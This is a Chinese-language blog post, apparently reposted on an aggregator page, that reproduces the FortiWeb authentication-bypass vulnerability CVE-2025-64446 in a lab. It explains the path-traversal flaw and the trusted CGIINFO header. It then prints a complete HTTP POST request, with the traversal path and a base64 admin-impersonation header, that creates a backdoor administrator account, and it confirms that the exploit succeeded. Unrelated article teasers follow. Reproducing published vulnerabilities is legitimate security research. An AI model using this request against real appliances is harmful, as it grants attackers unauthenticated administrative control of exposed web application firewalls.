news 2026/3/4 14:58:04

复现Fortinet FortiWeb高危漏洞CVE-2025-64446:路径遍历与远程代码执行的组合攻击

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
复现Fortinet FortiWeb高危漏洞CVE-2025-64446:路径遍历与远程代码执行的组合攻击

复现CVE-2025–64446:Fortinet FortiWeb中的关键漏洞

在这篇短文中,我们将复现CVE-2025–64446,这是Fortinet FortiWeb中的一个关键漏洞。该漏洞的CVSS评分为9.8(关键),影响多个FortiWeb版本,包括7.0、7.2、7.4、7.6和8.0分支。

“从根本上说,FortiWeb CVE-2025–64446漏洞存在的原因是FortiWeb的GUI API处理器在处理之前未能正确验证或清理URL路径。攻击者可以制作一个恶意的HTTP请求,滥用相对路径遍历序列来突破预期的/api/v2.0/路由路径。在易受攻击的系统中,FortiWeb的Apache配置会在解析编码字符或折叠目录遍历标记之前,将任何以/api/v2.0/开头的请求转发到后端CGI处理器。这意味着,如下所示的精心构造的请求可以直接路由到内部的fwbcgi管理组件,而不是合法的API端点。” —— Picus Security

因此,正如Defused团队在X(原Twitter)帖子中所示,我们需要调用或触发如下所示的端点。这是可能的,因为存在路径遍历漏洞。另一个重要组件是“cgi-bin/fwbcgi”。

“CGI的认证函数cgi_auth信任一个名为HTTP_CGIINFO的用户提供头部。该头部包含base64编码的JSON字段,如usernameprofnameloginname。” —— Picus Security

因此,如下面的负载所示(来自X的帖子),我们只需要添加一个名为“CGIINFO”的自定义HTTP请求头部。对于其值,我们可以对{“profname”: “prof_admin”, “vdom”: “root”, “username”: “admin”,”loginname”: “admin”}进行base64编码,以冒充管理员用户。我们不需要知道管理员的密码。

/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi

(来自Defused的X账户图片)

我们快速启动了一个Fortinet FortiWeb 8.0.0实例来尝试此漏洞利用。

(目标虚拟机运行在192.168.4.31的图片)

我们可以先在目标虚拟机上运行Nmap,检查有哪些监听端口。

(测试者在目标虚拟机上运行Nmap的图片)

我们还可以先尝试以管理员用户SSH到目标虚拟机,以在利用前检查当前的管理员用户。在FortiWeb CLI中运行“get system admin”。

(我们以管理员用户SSH到目标虚拟机后运行的命令图片)

负载
然后我们可以使用下面的负载来创建一个后门账户,这三个参数(nameaccess-profilepassword)是成功创建账户所需的最少参数。

POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1 Host: <目标主机地址> Accept-Encoding: gzip, deflate, br Content-Length: 101 CGIINFO: eyJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJ1c2VybmFtZSI6ICJhZG1pbiIsImxvZ2lubmFtZSI6ICJhZG1pbiJ9 Content-Type: application/x-www-form-urlencoded Connection: keep-alive {"data":{"name":"backdooruser1","access-profile":"prof_admin","password":"backdoorpass1"}}

(显示提供给CGIINFO自定义头部的base64值的图片)
(我们用于创建后门账户的负载图片)

最后,我们可以确认后门账户已成功创建。

(我们以backdooruser1用户SSH到目标虚拟机后运行的命令图片)

参考资料:

  • https://www.picussecurity.com/resource/blog/fortiweb-cve-2025-64446-vulnerability-path-traversal-leads-to-remote-code-execution
  • https://www.rapid7.com/blog/post/etr-critical-vulnerability-in-fortinet-fortiweb-exploited-in-the-wild/
  • https://nvd.nist.gov/vuln/detail/CVE-2025-58034
  • https://x.com/DefusedCyber/status/1975242250373517373/photo/1
  • https://github.com/lincemorado97/CVE-2025-64446_CVE-2025-58034
  • https://horizon3.ai/attack-research/vulnerabilities/cve-2025-64446/

免责声明:
本博客提供的信息仅用于一般信息目的。虽然我总是力求准确,但某些细节可能不准确,提供的列表也可能不完整。尽管如此,我强烈建议在做出任何决定或采取行动之前,根据行业标准文档和官方来源(上面参考资料部分列出了一些)验证任何关键信息。此处表达的所有观点均为我个人观点,不代表我的雇主的观点或立场。
CSD0tFqvECLokhw9aBeRqtTv15RNmaHdiNZPviuVo928jJlaselhk65nWD039QZriEPK1A5gyFu0XLtW575tlrBbnW/rsV1/m+lpY3hEPCqmof5YgUCgvva1km4GQmVLA/J2t+6hp8+EtWy5cGV5eiHL72Jk4Q2ig8dS+OCcV8VXkciIiKrns9h5MXAJe7G0
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/3/4 11:13:18

9 款 AI 写论文哪个好?实测虎贲等考 AI:毕业论文的智能通关王炸

毕业季的论文赛道上&#xff0c;“9 款 AI 写论文哪个好” 的灵魂拷问&#xff0c;总能在高校互助群里刷屏。不少同学踩坑无数&#xff1a;有的工具生成内容充斥 “文献幻觉”&#xff0c;有的查重结果与学校标准脱节&#xff0c;有的 AI 痕迹明显被系统预警。作为深耕论文写作…

作者头像 李华
网站建设 2026/3/4 10:00:44

企业ERRP实施流程架构及主数据方法论:流程框架方法论、主数据管理方法论

本资料系统阐述了企业信息化项目中流程架构与主数据管理的核心方法论。流程框架部分构建了从高阶模块到具体步骤的五级体系&#xff0c;实现业务可视化与标准化&#xff1b;主数据管理则聚焦于企业核心数据的统一规范、质量管控与治理机制。二者协同为企业打造高效、一致、可复…

作者头像 李华
网站建设 2026/3/4 8:30:37

【53页PPT】大型集团财务组织体系建设方案:战略导向、核心要素、财务管控模式与组织架构类型、案例分析

本方案系统阐述大型集团财务组织体系的建设路径&#xff0c;以战略为导向&#xff0c;从管控模式入手&#xff0c;提出集权、分权、融合及共享服务四种模式。借鉴500强企业案例&#xff0c;建议采用融合式管控&#xff0c;划分中后台垂直管理与前台矩阵支持&#xff0c;明确总部…

作者头像 李华
网站建设 2026/3/4 1:05:58

深入浅出 HLS 协议:从原理到实战,彻底搞懂 M3U8 视频流

在移动互联网和 5G 普及的今天&#xff0c;视频直播和点播业务已经成为了开发中的高频需求。提到 Web 端的流媒体传输&#xff0c;HLS (HTTP Live Streaming) 和它的核心文件格式 M3U8 是绕不开的技术栈。 很多后端或前端开发者在初次接触视频流时&#xff0c;往往会遇到各种问…

作者头像 李华